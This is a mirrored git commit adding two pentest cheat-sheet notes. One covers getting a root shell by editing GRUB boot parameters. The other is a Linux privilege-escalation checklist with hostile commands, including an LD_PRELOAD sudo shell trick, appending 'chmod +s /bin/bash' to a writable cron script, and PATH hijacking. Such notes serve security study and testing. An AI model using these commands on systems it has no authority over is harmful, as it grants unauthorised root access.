mirror of
https://github.com/anotherhadi/sec-notes.git
synced 2026-10-05 15:48:25 +02:00
init
This commit is contained in:
@@ -0,0 +1,79 @@
|
||||
---
|
||||
title: "GRUB Boot Bypass"
|
||||
description: "Physical access techniques to get a root shell by editing GRUB boot parameters."
|
||||
tags: ["linux", "grub", "physical-access", "privesc"]
|
||||
publishDate: 2026-05-18
|
||||
---
|
||||
|
||||
<!-- START doctoc generated TOC please keep comment here to allow auto update -->
|
||||
<!-- DON'T EDIT THIS SECTION, INSTEAD RE-RUN doctoc TO UPDATE -->
|
||||
|
||||
- [Techniques](#techniques)
|
||||
- [init=/bin/sh](#initbinsh)
|
||||
- [init=/bin/bash](#initbinbash)
|
||||
- [rd.break (systemd)](#rdbreak-systemd)
|
||||
- [single (single-user mode)](#single-single-user-mode)
|
||||
- [systemd.unit=rescue.target](#systemdunitrescuetarget)
|
||||
|
||||
<!-- END doctoc generated TOC please keep comment here to allow auto update -->
|
||||
|
||||
When GRUB is not password-protected, anyone with physical access can edit boot parameters and bypass authentication entirely.
|
||||
|
||||
At the GRUB menu, press **`e`** to edit the selected entry. Modify the line starting with `linux`, then press **`F10`** to boot.
|
||||
|
||||
## Techniques
|
||||
|
||||
### init=/bin/sh
|
||||
|
||||
Replaces the init process with a shell; drops directly into a root shell before any login prompt.
|
||||
|
||||
```
|
||||
linux ... init=/bin/sh
|
||||
```
|
||||
|
||||
Filesystem is mounted read-only by default. Remount to make changes:
|
||||
|
||||
```bash
|
||||
mount -o remount,rw /
|
||||
```
|
||||
|
||||
### init=/bin/bash
|
||||
|
||||
Same as above but uses bash. Add `rw` on the `linux` line to mount read-write from the start:
|
||||
|
||||
```
|
||||
linux ... rw init=/bin/bash
|
||||
```
|
||||
|
||||
### rd.break (systemd)
|
||||
|
||||
Interrupts the boot process in the initramfs, before the real root filesystem is mounted. Useful for resetting the root password.
|
||||
|
||||
```
|
||||
linux ... rd.break
|
||||
```
|
||||
|
||||
From the initramfs shell:
|
||||
|
||||
```bash
|
||||
mount -o remount,rw /sysroot
|
||||
chroot /sysroot
|
||||
passwd root
|
||||
exit
|
||||
```
|
||||
|
||||
### single (single-user mode)
|
||||
|
||||
Boots into maintenance mode. On some distros this drops to a root shell without a password prompt (not Debian/Ubuntu).
|
||||
|
||||
```
|
||||
linux ... single
|
||||
```
|
||||
|
||||
### systemd.unit=rescue.target
|
||||
|
||||
systemd equivalent of single-user mode: minimal services, root shell.
|
||||
|
||||
```
|
||||
linux ... systemd.unit=rescue.target
|
||||
```
|
||||
@@ -0,0 +1,93 @@
|
||||
---
|
||||
title: "Linux Privilege Escalation"
|
||||
description: "Common misconfigurations and weaknesses to check when escalating privileges on Linux."
|
||||
tags: ["linux", "privesc", "post-exploitation"]
|
||||
publishDate: 2026-05-18
|
||||
---
|
||||
|
||||
<!-- START doctoc generated TOC please keep comment here to allow auto update -->
|
||||
<!-- DON'T EDIT THIS SECTION, INSTEAD RE-RUN doctoc TO UPDATE -->
|
||||
|
||||
- [Sudo](#sudo)
|
||||
- [SUID / SGID](#suid--sgid)
|
||||
- [Misconfiguration](#misconfiguration)
|
||||
- [Cron Jobs](#cron-jobs)
|
||||
- [Capabilities](#capabilities)
|
||||
- [Kernel Exploits](#kernel-exploits)
|
||||
- [LinPEAS / WinPEAS](#linpeas--winpeas)
|
||||
|
||||
<!-- END doctoc generated TOC please keep comment here to allow auto update -->
|
||||
|
||||
## Sudo
|
||||
|
||||
```bash
|
||||
sudo -l
|
||||
```
|
||||
|
||||
Check [GTFOBins](https://gtfobins.github.io) for any listed binary.
|
||||
|
||||
If `env_keep+=LD_PRELOAD` is set:
|
||||
|
||||
```bash
|
||||
# compile a shared lib that spawns a shell
|
||||
gcc -fPIC -shared -o /tmp/shell.so shell.c -nostartfiles
|
||||
sudo LD_PRELOAD=/tmp/shell.so <allowed_binary>
|
||||
```
|
||||
|
||||
## SUID / SGID
|
||||
|
||||
```bash
|
||||
find / -user root -perm -4000 -ls 2>/dev/null # SUID
|
||||
find / -group root -perm -2000 -ls 2>/dev/null # SGID
|
||||
```
|
||||
|
||||
Check any non-standard binary on GTFOBins.
|
||||
|
||||
## Misconfiguration
|
||||
|
||||
```bash
|
||||
# World-writable directories
|
||||
find / -type d -perm -2 -ls 2>/dev/null
|
||||
|
||||
# World-writable files owned by root
|
||||
find / -user root -perm -2 ! -type l -ls 2>/dev/null
|
||||
```
|
||||
|
||||
## Cron Jobs
|
||||
|
||||
```bash
|
||||
cat /etc/crontab
|
||||
ls -la /etc/cron.*
|
||||
crontab -l
|
||||
```
|
||||
|
||||
If a cron runs a script you can write to, replace its content:
|
||||
|
||||
```bash
|
||||
echo 'chmod +s /bin/bash' >> /path/to/script.sh
|
||||
```
|
||||
|
||||
If the cron uses a relative PATH and a directory is writable, drop a malicious binary earlier in `$PATH`.
|
||||
|
||||
## Capabilities
|
||||
|
||||
```bash
|
||||
getcap -r / 2>/dev/null
|
||||
```
|
||||
|
||||
Dangerous capabilities: `cap_setuid`, `cap_net_raw`, `cap_dac_override`.
|
||||
Check [GTFOBins](https://gtfobins.github.io) for exploitation.
|
||||
|
||||
## Kernel Exploits
|
||||
|
||||
```bash
|
||||
uname -r
|
||||
searchsploit linux kernel $(uname -r)
|
||||
```
|
||||
|
||||
## LinPEAS / WinPEAS
|
||||
|
||||
Automated enumeration scripts to surface privesc vectors quickly.
|
||||
|
||||
- [LinPEAS (linux)](https://github.com/peass-ng/PEASS-ng/tree/master/linPEAS)
|
||||
- [WinPEAS (windows)](https://github.com/peass-ng/PEASS-ng/tree/master/winPEAS)
|
||||
Reference in New Issue
Block a user